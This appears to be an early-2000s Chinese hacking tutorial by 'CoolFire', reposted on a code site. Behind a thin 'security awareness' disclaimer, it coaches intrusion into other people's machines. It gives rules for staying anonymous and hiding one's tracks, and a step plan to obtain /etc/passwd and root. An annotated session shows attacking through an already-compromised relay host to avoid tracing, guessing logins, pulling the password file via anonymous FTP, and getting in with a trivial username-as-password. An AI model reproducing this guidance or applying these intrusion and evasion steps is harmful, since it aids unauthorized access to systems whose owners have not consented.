?? 破解系統(tǒng) (2001年4月4日).txt
字號:
破解系統(tǒng) (2001年4月4日)
網(wǎng)友更新 分類:雜類 作者:abcool 推薦:abcool 閱讀次數(shù):514
(http://www.codesky.net)
--------------------------------------------------------------------------------
Hi,All:
這不是一個教學(xué)文件, 只是告訴你該如何破解系統(tǒng), 好讓你能夠?qū)⒆约旱南到y(tǒng)作安全
的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的
電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不
是教人 Crack Password 若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不
負(fù)責(zé) !!
#1 甚麼是 Hacking ?
就是入侵電腦! 有甚麼好解釋的! 大部份有關(guān)介紹 Hacker 的書籍或小說及文件
等都有清楚的介紹, 沉迷於電腦的人... 破壞... 唉! 一大堆怪解釋就是了, 最
好不要成為一個 "駭客", 我... 不是!
#2 為甚麼要 Hack ?
我們只是為了要了解更多關(guān)於系統(tǒng)的技術(shù), 入侵它, 了解它是如何運(yùn)作的, 試試
它的安全性, 然後學(xué)著去使用它, 讀取系統(tǒng)中有關(guān)操作的說明, 學(xué)習(xí)它的各項(xiàng)操
作 !! 為了安全性而作革命!
#3 Hack 守則
1. 不惡意破壞任何的系統(tǒng), 這樣作只會給你帶來麻煩.
惡意破壞它人的軟體將導(dǎo)致法律刑責(zé), 如果你只是使用電腦, 那僅為非法使
用!! 注意: 千萬不要破壞別人的軟體或資料 !!
2. 不修改任何的系統(tǒng)檔, 如果你是為了要進(jìn)入系統(tǒng)而修改它, 請?jiān)诖鸬侥康尼?將它改回原狀.
3. 不要輕易的將你要 Hack 的站臺告訴你不信任的朋友.
4. 不要在 bbs 上談?wù)撃?Hack 的任何事情.
5. 在 Post 文章的時候不要使用真名.
6. 正在入侵的時候, 不要隨意離開你的電腦.
7. 不要侵入或破壞政府機(jī)關(guān)的主機(jī).
8. 不在電話中談?wù)撃?Hack 的任何事情.
9. 將你的筆記放在安全的地方.
10. 想要成為 Hacker 就要真正的 Hacking, 讀遍所有有關(guān)系統(tǒng)安全或系統(tǒng)漏洞
的文件 (英文快點(diǎn)學(xué)好)!
11. 已侵入電腦中的帳號不得清除或修改.
12. 不得修改系統(tǒng)檔案, 如果為了隱藏自己的侵入而作的修改則不在此限, 但仍須
維持原來系統(tǒng)的安全性, 不得因得到系統(tǒng)的控制權(quán)而將門戶大開 !!
13. 不將你已破解的帳號分享與你的朋友.
#4 破解之道
1. 進(jìn)入主機(jī)中
2. 得到 /etc/passwd
3. 得到系統(tǒng)帳號
4. 得到最高權(quán)限
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
進(jìn)入主機(jī)有好幾種方式, 可以經(jīng)由 Telnet (Port 23) 或 SendMail (Port 25)
或 FTP 或 WWW (Port 80) 的方式進(jìn)入, 一臺主機(jī)雖然只有一個位址, 但是它可能
同時進(jìn)行多項(xiàng)服務(wù), 所以如果你只是要 "進(jìn)入" 該主機(jī), 這些 Port 都是很好的進(jìn)
行方向. 當(dāng)然還有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麼??? 我不知
道, 你知道嗎?!
底下的示范并不是像寫出來的那麼容易, 只不過是要讓你了解如何進(jìn)入, 當(dāng)然其
中還有很多問題, 如打錯指令...... 等等的毛病... 沒有出現(xiàn)在課堂上, 但是我為了
面子.... 一定要刪掉這些不堪入目的東西嘛...
示范進(jìn)入主機(jī)的方法: (By CoolFire)
(首先要先連上某一臺你已經(jīng)有帳號的 Telnet 主機(jī), 當(dāng)然最好是假的, 也就是 Crack
過的主機(jī), 然後利用它來 Crack 別的主機(jī), 才不會被別人以逆流法查出你的所在)
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
(我用的是 ms.hinet.net ... 當(dāng)然是假的羅, 都已經(jīng)經(jīng)過修改了啦 !!
沒有這一臺主機(jī)啦 !! 別怕 ! 別怕 ! 以下的主機(jī)名稱都是假的名
稱, 請同學(xué)們要記得 !!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 進(jìn)來了 ! 開始攻擊吧 ! 本次的目標(biāo)是......)
ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 試試看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(沒關(guān)系, 再來 !!)
cool login: hinet
Password:
Login incorrect
cool login:
(都沒猜對, 這邊用的是 猜 的方法, 今天運(yùn)氣好像不好)
telnet> close
Connection closed.
(重來, 換個 Port 試試看 !!)
ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
Error 400
Invalid request "" (unknown method)
--------------------------------------------------------------------------------
CERN-HTTPD 3.0A
Connection closed by foreign host.
(哇哩 !! 連密碼都沒得輸入, 真是..... 再來 !! 要有恒心 !!)
(換 FTP Port 試試)
ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(哇 ! 可以用 anonymous 進(jìn)來耶!! password 部份輸入 aaa@ 就好了 !
不要留下足跡喔!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(嗯嗯... 太好了 ! 進(jìn)來了 !! 下一個目標(biāo)是.....)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回來 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 這麼容易嗎??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(哇哩... 是 Shadow 的... 真是出師不利.... )
ftp> bye
221 Goodbye.
(不信邪.... 還是老話, 要有恒心....)
(FTP 不行, 再 Telnet 看看 !!)
ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(又猜錯 !!)
cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand
progress.
cool:~$
(哇哈哈 !! 哪個笨 root, 用 system name 作 username 連
password 也是 system name.... 總算... 沒白玩...)
cool:~$ system
bash: system: command not found
(嗯... 這個 user 的權(quán)限好像不大....)
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -